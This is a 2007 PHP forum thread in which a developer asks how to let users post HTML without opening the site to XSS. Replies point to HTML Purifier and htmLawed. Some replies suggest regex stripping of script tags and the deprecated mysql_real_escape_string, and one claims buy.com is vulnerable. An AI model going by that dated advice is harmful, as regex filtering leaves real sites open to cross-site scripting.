pocobueno1388 Posted August 27, 2007 Share Posted August 27, 2007 I am trying to keep security in mind before I start a large project, so I have a quick question. I understand that it isn't safe to allow users to input HTML or any code into the database. My question is, if I use htmlentities() on all input where the user is allowed to use code that will be inserted into the database, will that keep away malicious javascript code? Obviously when I want to display this information from the database I will use html_entity_decode(), but won't that just change it back from HTML entities to normal HTML again? If it does that, doesn't that mean that the code will still be executed, and I would still be vulnerable to the attacks that are in the code? Maybe this is the reason BBC code was created? If I don't have to use it though, I would rather not. Quote Link to comment Share on other sites More sharing options...
Jessica Posted August 27, 2007 Share Posted August 27, 2007 You are correct. You can use one of the many libraries out there for cleaning HTML if you want to allow it and still prevent XSS attacks. Check out this page: http://htmlpurifier.org/comparison.html PS: You'd be surprised how many big sites are vulnerable to XSS. buy.com still is Quote Link to comment Share on other sites More sharing options...
Dragen Posted August 27, 2007 Share Posted August 27, 2007 just use mysql_real_escape_string($value); on everything you put into a database. When you output it use: htmlentities($value) html entities changes everything to it's ascii code, such as & = & Quote Link to comment Share on other sites More sharing options...
dbo Posted August 27, 2007 Share Posted August 27, 2007 Decoding it will in fact make you susceptible again. You could do a regular expression search/replace to remove any script tags... because there really isn't a need to allow users to enter in javascript to begin with. If you find any occurences you may consider logging it so that you can see what malicious users were trying to do. Or you could replace < and > with ( and ) on script tags and output it as text... but that's kind ugly. Really depends on your situation. Can you provide some more insight? Quote Link to comment Share on other sites More sharing options...
Jessica Posted August 27, 2007 Share Posted August 27, 2007 If you want to remove any HTML, use strip_tags(). If you want to allow "safe" html, check out the page above. Quote Link to comment Share on other sites More sharing options...
pocobueno1388 Posted August 27, 2007 Author Share Posted August 27, 2007 Jesirose, looks like that is exactly what I am looking for =] I will check it out. I don't want to NOT allow HTML, I would like the users of my site to be able to use HTML to "decorate" there personal pages. I just want to make sure I'm protected from the XSS attacks mostly. Wow, how could buy.com not be protected? 0_0 You would think they would have enough money to get it done... Okay, I'm gonna check out that site, then I will be back to report the thread as solved if it's what I'm looking for. If anyone else has any suggestions, please share Quote Link to comment Share on other sites More sharing options...
Jessica Posted August 27, 2007 Share Posted August 27, 2007 Yeah, and if you TELL buy.com or one of the other large sites, they threaten to prosecute you for attempted hacking. Don't get me started on these morons. Quote Link to comment Share on other sites More sharing options...
pocobueno1388 Posted August 27, 2007 Author Share Posted August 27, 2007 Thanks jesirose, the library is perfect =] Yeah, lets definitely not get started on that, I can already tell they are a bunch of morons. They will be forced to secure it sooner or later, and if they don't, we will just sit back an watch their empire fall =] I'm speaking from not much knowledge on just how vulnerable they are, but not being protected from those attacks couldn't be a good thing. Anyways, thanks again xD I'm assuming that this library will catch JavaScript as well? Quote Link to comment Share on other sites More sharing options...
pocobueno1388 Posted August 27, 2007 Author Share Posted August 27, 2007 Nevermind, it looks like it covers malicious javascript as well =] The name threw me off "HTML Purifier". Quote Link to comment Share on other sites More sharing options...
alpha2zee Posted November 7, 2007 Share Posted November 7, 2007 For filtering input, one may also think of using <a href="http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/index.php">htmLawed</a>, a highly customizable, 45 kb, single file, non-OOP PHP script to filter and purify HTML. Besides restricting tags/elements, attributes and URL protocols as per one's specification, and balancing HTML tags and ensuring valid tag nesting/well-formedness, it also has good anti-XSS and anti-spam measures. Quote Link to comment Share on other sites More sharing options...
pocobueno1388 Posted November 7, 2007 Author Share Posted November 7, 2007 Thanks for your input...but this thread is 2 months old, and has been solved. No need to bring it back from the dead =] Quote Link to comment Share on other sites More sharing options...
revraz Posted November 7, 2007 Share Posted November 7, 2007 I can see their building here from my office, maybe I'll walk over there and tell them face to face. Yeah, and if you TELL buy.com or one of the other large sites, they threaten to prosecute you for attempted hacking. Don't get me started on these morons. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.